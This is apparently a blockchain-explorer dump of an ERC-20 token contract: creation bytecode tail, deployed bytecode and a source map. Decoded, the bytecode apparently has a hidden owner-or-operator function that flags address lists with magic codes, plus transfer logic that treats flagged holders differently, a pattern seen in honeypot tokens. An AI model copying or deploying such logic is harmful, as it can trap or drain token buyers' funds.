b565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d85919061155a565b60405180910390a3505050565b5f610d9d848461072e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e175781811015610e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0090611b23565b60405180910390fd5b610e168484848403610bcf565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611bb1565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef090611c3f565b60405180910390fd5b5f610f058484846111cf565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8290611ccd565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051611076919061155a565b60405180910390a361108985858561129d565b5050505050565b611098610bc8565b73ffffffffffffffffffffffffffffffffffffffff166110b661058e565b73ffffffffffffffffffffffffffffffffffffffff161461110c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110390611d35565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061126b575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561129257600954600854836112819190611d53565b61128b9190611dc1565b9050611296565b8190505b9392505050565b60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611396575f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113d25780820151818401526020810190506113b7565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113f78261139b565b61140181856113a5565b93506114118185602086016113b5565b61141a816113dd565b840191505092915050565b5f6020820190508181035f83015261143d81846113ed565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6114768261144d565b9050919050565b6114868161146c565b8114611490575f80fd5b50565b5f813590506114a18161147d565b92915050565b5f819050919050565b6114b9816114a7565b81146114c3575f80fd5b50565b5f813590506114d4816114b0565b92915050565b5f80604083850312156114f0576114ef611445565b5b5f6114fd85828601611493565b925050602061150e858286016114c6565b9150509250929050565b5f8115159050919050565b61152c81611518565b82525050565b5f6020820190506115455f830184611523565b92915050565b611554816114a7565b82525050565b5f60208201905061156d5f83018461154b565b92915050565b5f805f6060848603121561158a57611589611445565b5b5f61159786828701611493565b93505060206115a886828701611493565b92505060406115b9868287016114c6565b9150509250925092565b5f60ff82169050919050565b6115d8816115c3565b82525050565b5f6020820190506115f15f8301846115cf565b92915050565b5f6020828403121561160c5761160b611445565b5b5f61161984828501611493565b91505092915050565b61162b8161146c565b82525050565b5f6020820190506116445f830184611622565b92915050565b5f80604083850312156116605761165f611445565b5b5f61166d85828601611493565b925050602061167e85828601611493565b9150509250929050565b611691816115c3565b811461169b575f80fd5b50565b5f813590506116ac81611688565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116d3576116d26116b2565b5b8235905067ffffffffffffffff8111156116f0576116ef6116b6565b5b60208301915083602082028301111561170c5761170b6116ba565b5b9250929050565b5f805f6040848603121561172a57611729611445565b5b5f6117378682870161169e565b935050602084013567ffffffffffffffff81111561175857611757611449565b5b611764868287016116be565b92509250509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806117b457607f821691505b6020821081036117c7576117c6611770565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611804826114a7565b915061180f836114a7565b9250828201905080821115611827576118266117cd565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6118876025836113a5565b91506118928261182d565b604082019050919050565b5f6020820190508181035f8301526118b48161187b565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f6118f2826114a7565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611924576119236117cd565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6119896026836113a5565b91506119948261192f565b604082019050919050565b5f6020820190508181035f8301526119b68161197d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611a176024836113a5565b9150611a22826119bd565b604082019050919050565b5f6020820190508181035f830152611a4481611a0b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611aa56022836113a5565b9150611ab082611a4b565b604082019050919050565b5f6020820190508181035f830152611ad281611a99565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611b0d601d836113a5565b9150611b1882611ad9565b602082019050919050565b5f6020820190508181035f830152611b3a81611b01565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611b9b6025836113a5565b9150611ba682611b41565b604082019050919050565b5f6020820190508181035f830152611bc881611b8f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611c296023836113a5565b9150611c3482611bcf565b604082019050919050565b5f6020820190508181035f830152611c5681611c1d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611cb76026836113a5565b9150611cc282611c5d565b604082019050919050565b5f6020820190508181035f830152611ce481611cab565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611d1f6020836113a5565b9150611d2a82611ceb565b602082019050919050565b5f6020820190508181035f830152611d4c81611d13565b9050919050565b5f611d5d826114a7565b9150611d68836114a7565b9250828202611d76816114a7565b91508282048414831517611d8d57611d8c6117cd565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611dcb826114a7565b9150611dd6836114a7565b925082611de657611de5611d94565b5b82820490509291505056fea2646970667358221220f92ea90f2e7f747523fc57a78ff77004d9c73d6741cd4ea8f9ea723c4a58ee1d64736f6c63430008140033

Deployed Bytecode

0x608060405234801561000f575f80fd5b5060043610610114575f3560e01c80638da5cb5b116100a0578063c55365711161006f578063c553657114610308578063dd62ed3e14610338578063ddf57ce314610368578063f2fde38b14610384578063f5792467146103a057610114565b80638da5cb5b1461026c57806395d89b411461028a578063a457c2d7146102a8578063a9059cbb146102d857610114565b8063313ce567116100e7578063313ce567146101b457806339509351146101d257806362ea82db1461020257806370a0823114610232578063715018a61461026257610114565b806306fdde0314610118578063095ea7b31461013657806318160ddd1461016657806323b872dd14610184575b5f80fd5b6101206103bc565b60405161012d9190611425565b60405180910390f35b610150600480360381019061014b91906114da565b61044c565b60405161015d9190611532565b60405180910390f35b61016e61046e565b60405161017b919061155a565b60405180910390f35b61019e60048036038101906101999190611573565b610477565b6040516101ab9190611532565b60405180910390f35b6101bc6104a5565b6040516101c991906115de565b60405180910390f35b6101ec60048036038101906101e791906114da565b6104ad565b6040516101f99190611532565b60405180910390f35b61021c600480360381019061021791906115f7565b6104e3565b6040516102299190611532565b60405180910390f35b61024c600480360381019061024791906115f7565b610535565b604051610259919061155a565b60405180910390f35b61026a61057b565b005b61027461058e565b6040516102819190611631565b60405180910390f35b6102926105b5565b60405161029f9190611425565b60405180910390f35b6102c260048036038101906102bd91906114da565b610645565b6040516102cf9190611532565b60405180910390f35b6102f260048036038101906102ed91906114da565b6106ba565b6040516102ff9190611532565b60405180910390f35b610322600480360381019061031d91906115f7565b6106dc565b60405161032f9190611532565b60405180910390f35b610352600480360381019061034d919061164a565b61072e565b60405161035f919061155a565b60405180910390f35b610382600480360381019061037d9190611713565b6107b0565b005b61039e600480360381019061039991906115f7565b610afb565b005b6103ba60048036038101906103b591906115f7565b610b7d565b005b6060600680546103cb9061179d565b80601f01602080910402602001604051908101604052809291908181526020018280546103f79061179d565b80156104425780601f1061041957610100808354040283529160200191610442565b820191905f5260205f20905b81548152906001019060200180831161042557829003601f168201915b5050505050905090565b5f80610456610bc8565b9050610463818585610bcf565b600191505092915050565b5f600554905090565b5f80610481610bc8565b905061048e858285610d92565b610499858585610e1d565b60019150509392505050565b5f6012905090565b5f806104b7610bc8565b90506104d88185856104c9858961072e565b6104d391906117fa565b610bcf565b600191505092915050565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610583611090565b61058c5f61110e565b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600780546105c49061179d565b80601f01602080910402602001604051908101604052809291908181526020018280546105f09061179d565b801561063b5780601f106106125761010080835404028352916020019161063b565b820191905f5260205f20905b81548152906001019060200180831161061e57829003601f168201915b5050505050905090565b5f8061064f610bc8565b90505f61065c828661072e565b9050838110156106a1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106989061189d565b60405180910390fd5b6106ae8286868403610bcf565b60019250505092915050565b5f806106c4610bc8565b90506106d1818585610e1d565b600191505092915050565b5f60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b5f60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6107b861058e565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16148061083d5750600a5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff16145b610845575f80fd5b602a8360ff16036108f2575f5b828290508110156108ec57600160035f858585818110610875576108746118bb565b5b905060200201602081019061088a91906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff02191690831515021790555080806108e4906118e8565b915050610852565b50610af6565b60048360ff160361099e575f5b82829050811015610998575f60035f858585818110610921576109206118bb565b5b905060200201602081019061093691906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610990906118e8565b9150506108ff565b50610af5565b60458360ff1603610a4b575f5b82829050811015610a4557600160025f8585858181106109ce576109cd6118bb565b5b90506020020160208101906109e391906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610a3d906118e8565b9150506109ab565b50610af4565b60068360ff1603610af3575f5b82829050811015610af1575f60025f858585818110610a7a57610a796118bb565b5b9050602002016020810190610a8f91906115f7565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508080610ae9906118e8565b915050610a58565b505b5b5b5b505050565b610b03611090565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b689061199f565b60405180910390fd5b610b7a8161110e565b50565b610b85611090565b80600a5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3490611a2d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611abb565b60405180910390fd5b8060045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d85919061155a565b60405180910390a3505050565b5f610d9d848461072e565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610e175781811015610e09576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e0090611b23565b60405180910390fd5b610e168484848403610bcf565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e8290611bb1565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef090611c3f565b60405180910390fd5b5f610f058484846111cf565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8290611ccd565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051611076919061155a565b60405180910390a361108985858561129d565b5050505050565b611098610bc8565b73ffffffffffffffffffffffffffffffffffffffff166110b661058e565b73ffffffffffffffffffffffffffffffffffffffff161461110c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110390611d35565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168061126b575060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561129257600954600854836112819190611d53565b61128b9190611dc1565b9050611296565b8190505b9392505050565b60035f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615611396575f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550600160025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b838110156113d25780820151818401526020810190506113b7565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6113f78261139b565b61140181856113a5565b93506114118185602086016113b5565b61141a816113dd565b840191505092915050565b5f6020820190508181035f83015261143d81846113ed565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6114768261144d565b9050919050565b6114868161146c565b8114611490575f80fd5b50565b5f813590506114a18161147d565b92915050565b5f819050919050565b6114b9816114a7565b81146114c3575f80fd5b50565b5f813590506114d4816114b0565b92915050565b5f80604083850312156114f0576114ef611445565b5b5f6114fd85828601611493565b925050602061150e858286016114c6565b9150509250929050565b5f8115159050919050565b61152c81611518565b82525050565b5f6020820190506115455f830184611523565b92915050565b611554816114a7565b82525050565b5f60208201905061156d5f83018461154b565b92915050565b5f805f6060848603121561158a57611589611445565b5b5f61159786828701611493565b93505060206115a886828701611493565b92505060406115b9868287016114c6565b9150509250925092565b5f60ff82169050919050565b6115d8816115c3565b82525050565b5f6020820190506115f15f8301846115cf565b92915050565b5f6020828403121561160c5761160b611445565b5b5f61161984828501611493565b91505092915050565b61162b8161146c565b82525050565b5f6020820190506116445f830184611622565b92915050565b5f80604083850312156116605761165f611445565b5b5f61166d85828601611493565b925050602061167e85828601611493565b9150509250929050565b611691816115c3565b811461169b575f80fd5b50565b5f813590506116ac81611688565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126116d3576116d26116b2565b5b8235905067ffffffffffffffff8111156116f0576116ef6116b6565b5b60208301915083602082028301111561170c5761170b6116ba565b5b9250929050565b5f805f6040848603121561172a57611729611445565b5b5f6117378682870161169e565b935050602084013567ffffffffffffffff81111561175857611757611449565b5b611764868287016116be565b92509250509250925092565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806117b457607f821691505b6020821081036117c7576117c6611770565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f611804826114a7565b915061180f836114a7565b9250828201905080821115611827576118266117cd565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f6118876025836113a5565b91506118928261182d565b604082019050919050565b5f6020820190508181035f8301526118b48161187b565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f6118f2826114a7565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203611924576119236117cd565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f6119896026836113a5565b91506119948261192f565b604082019050919050565b5f6020820190508181035f8301526119b68161197d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611a176024836113a5565b9150611a22826119bd565b604082019050919050565b5f6020820190508181035f830152611a4481611a0b565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611aa56022836113a5565b9150611ab082611a4b565b604082019050919050565b5f6020820190508181035f830152611ad281611a99565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f611b0d601d836113a5565b9150611b1882611ad9565b602082019050919050565b5f6020820190508181035f830152611b3a81611b01565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611b9b6025836113a5565b9150611ba682611b41565b604082019050919050565b5f6020820190508181035f830152611bc881611b8f565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f611c296023836113a5565b9150611c3482611bcf565b604082019050919050565b5f6020820190508181035f830152611c5681611c1d565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611cb76026836113a5565b9150611cc282611c5d565b604082019050919050565b5f6020820190508181035f830152611ce481611cab565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f611d1f6020836113a5565b9150611d2a82611ceb565b602082019050919050565b5f6020820190508181035f830152611d4c81611d13565b9050919050565b5f611d5d826114a7565b9150611d68836114a7565b9250828202611d76816114a7565b91508282048414831517611d8d57611d8c6117cd565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f611dcb826114a7565b9150611dd6836114a7565b925082611de657611de5611d94565b5b82820490509291505056fea2646970667358221220f92ea90f2e7f747523fc57a78ff77004d9c73d6741cd4ea8f9ea723c4a58ee1d64736f6c63430008140033

Deployed Bytecode Sourcemap

135:153:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1034:98:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4393:197;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3204:106;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5152:286;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1971:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;5833:234;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2927:102;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3368:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2457:101:0;;;:::i;:::-;;1834:85;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1245:102:1;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6554:427;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3689:189;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3035:109;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3936:149;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2175:745;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2707:198:0;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2068:101:1;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1034:98;1088:13;1120:5;1113:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1034:98;:::o;4393:197::-;4476:4;4492:13;4508:12;:10;:12::i;:::-;4492:28;;4530:32;4539:5;4546:7;4555:6;4530:8;:32::i;:::-;4579:4;4572:11;;;4393:197;;;;:::o;3204:106::-;3265:7;3291:12;;3284:19;;3204:106;:::o;5152:286::-;5279:4;5295:15;5313:12;:10;:12::i;:::-;5295:30;;5335:38;5351:4;5357:7;5366:6;5335:15;:38::i;:::-;5383:27;5393:4;5399:2;5403:6;5383:9;:27::i;:::-;5427:4;5420:11;;;5152:286;;;;;:::o;1971:91::-;2029:5;2053:2;2046:9;;1971:91;:::o;5833:234::-;5921:4;5937:13;5953:12;:10;:12::i;:::-;5937:28;;5975:64;5984:5;5991:7;6028:10;6000:25;6010:5;6017:7;6000:9;:25::i;:::-;:38;;;;:::i;:::-;5975:8;:64::i;:::-;6056:4;6049:11;;;5833:234;;;;:::o;2927:102::-;2981:4;3004:7;:18;3012:9;3004:18;;;;;;;;;;;;;;;;;;;;;;;;;2997:25;;2927:102;;;:::o;3368:125::-;3442:7;3468:9;:18;3478:7;3468:18;;;;;;;;;;;;;;;;3461:25;;3368:125;;;:::o;2457:101:0:-;1727:13;:11;:13::i;:::-;2521:30:::1;2548:1;2521:18;:30::i;:::-;2457:101::o:0;1834:85::-;1880:7;1906:6;;;;;;;;;;;1899:13;;1834:85;:::o;1245:102:1:-;1301:13;1333:7;1326:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1245:102;:::o;6554:427::-;6647:4;6663:13;6679:12;:10;:12::i;:::-;6663:28;;6701:24;6728:25;6738:5;6745:7;6728:9;:25::i;:::-;6701:52;;6791:15;6771:16;:35;;6763:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;6882:60;6891:5;6898:7;6926:15;6907:16;:34;6882:8;:60::i;:::-;6970:4;6963:11;;;;6554:427;;;;:::o;3689:189::-;3768:4;3784:13;3800:12;:10;:12::i;:::-;3784:28;;3822;3832:5;3839:2;3843:6;3822:9;:28::i;:::-;3867:4;3860:11;;;3689:189;;;;:::o;3035:109::-;3092:4;3115:11;:22;3127:9;3115:22;;;;;;;;;;;;;;;;;;;;;;;;;3108:29;;3035:109;;;:::o;3936:149::-;4025:7;4051:11;:18;4063:5;4051:18;;;;;;;;;;;;;;;:27;4070:7;4051:27;;;;;;;;;;;;;;;;4044:34;;3936:149;;;;:::o;2175:745::-;2270:7;:5;:7::i;:::-;2256:21;;:10;:21;;;2255:53;;;;2297:10;;;;;;;;;;;2283:24;;:10;:24;;;2255:53;2247:62;;;;;;2332:2;2324:4;:10;;;2320:594;;2355:9;2350:106;2374:6;;:13;;2370:1;:17;2350:106;;;2437:4;2412:11;:22;2424:6;;2431:1;2424:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2412:22;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;2389:3;;;;;:::i;:::-;;;;2350:106;;;;2320:594;;;2484:1;2476:4;:9;;;2472:442;;2506:9;2501:107;2525:6;;:13;;2521:1;:17;2501:107;;;2588:5;2563:11;:22;2575:6;;2582:1;2575:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2563:22;;;;;;;;;;;;;;;;:30;;;;;;;;;;;;;;;;;;2540:3;;;;;:::i;:::-;;;;2501:107;;;;2472:442;;;2636:2;2628:4;:10;;;2624:290;;2659:9;2654:102;2678:6;;:13;;2674:1;:17;2654:102;;;2737:4;2716:7;:18;2724:6;;2731:1;2724:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2716:18;;;;;;;;;;;;;;;;:25;;;;;;;;;;;;;;;;;;2693:3;;;;;:::i;:::-;;;;2654:102;;;;2624:290;;;2784:1;2776:4;:9;;;2772:142;;2806:9;2801:103;2825:6;;:13;;2821:1;:17;2801:103;;;2884:5;2863:7;:18;2871:6;;2878:1;2871:9;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;2863:18;;;;;;;;;;;;;;;;:26;;;;;;;;;;;;;;;;;;2840:3;;;;;:::i;:::-;;;;2801:103;;;;2772:142;2624:290;2472:442;2320:594;2175:745;;;:::o;2707:198:0:-;1727:13;:11;:13::i;:::-;2815:1:::1;2795:22;;:8;:22;;::::0;2787:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;2870:28;2889:8;2870:18;:28::i;:::-;2707:198:::0;:::o;2068:101:1:-;1727:13:0;:11;:13::i;:::-;2152:10:1::1;2139;;:23;;;;;;;;;;;;;;;;;;2068:101:::0;:::o;587:96:0:-;640:7;666:10;659:17;;587:96;:::o;10786:370:1:-;10934:1;10917:19;;:5;:19;;;10909:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11014:1;10995:21;;:7;:21;;;10987:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11096:6;11066:11;:18;11078:5;11066:18;;;;;;;;;;;;;;;:27;11085:7;11066:27;;;;;;;;;;;;;;;:36;;;;